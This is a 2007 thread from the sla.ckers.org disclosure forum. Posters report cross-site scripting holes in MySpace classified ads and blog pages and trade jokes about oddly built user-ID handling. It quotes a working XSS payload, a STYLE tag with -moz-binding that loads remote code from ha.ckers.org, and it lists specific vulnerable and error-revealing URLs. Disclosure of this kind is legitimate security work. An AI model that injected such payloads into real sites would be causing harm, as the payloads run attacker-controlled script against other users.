Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
More myspace
Posted by: tx
Date: March 23, 2007 03:31AM

There are a couple areas vulnerable to the Remote style sheet part 4 vector on the cheat sheet : <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> .

Namely the Body of any ads posted in the classified section (sorry, no link). I also was able to get an alert in the blog section: http://blog.myspace.com/index.cfm?fuseaction=blog.view&friendID=171414541&blogID=244568582&MyToken= <-FF only
There may be more, but I haven't looked for them.

On a semi-related note, check out this error page: http://blog.myspace.com/blog/rss.cfm?friendID=x
I don't think it's useful/exploitable, but it's definitely wierd.

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: More myspace
Posted by: rsnake
Date: March 23, 2007 11:50AM

Very cool! That's not a super common one. And that is a really odd bug you found there. It actually gives some insight into how the site was built.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: More myspace
Posted by: trev
Date: March 23, 2007 10:07PM

We know how this site was built - with much hard work from underpaid and underqualified developers :)

That's really the entire template printed in plain text - nice find tx!

PS: "Parameter must be a double" - WTF??? Are they really using floating point numbers to identify users? Edit2: They really are that crazy: http://blog.myspace.com/blog/rss.cfm?friendID=1233123.4E1
Edit3: And then they convert these floating point numbers to int64, see error message on http://blog.myspace.com/blog/rss.cfm?friendID=1233123.4E256



Edited 3 time(s). Last edit at 03/23/2007 10:16PM by trev.

Options: ReplyQuote
Re: More myspace
Posted by: tx
Date: March 23, 2007 11:42PM

Well you know, alot of the users are underage, and you can't expect them to be represented with a whole userid... a 13 year old is really like 0.75 of a user.

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: More myspace
Posted by: rsnake
Date: March 24, 2007 12:53AM

haha :)

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.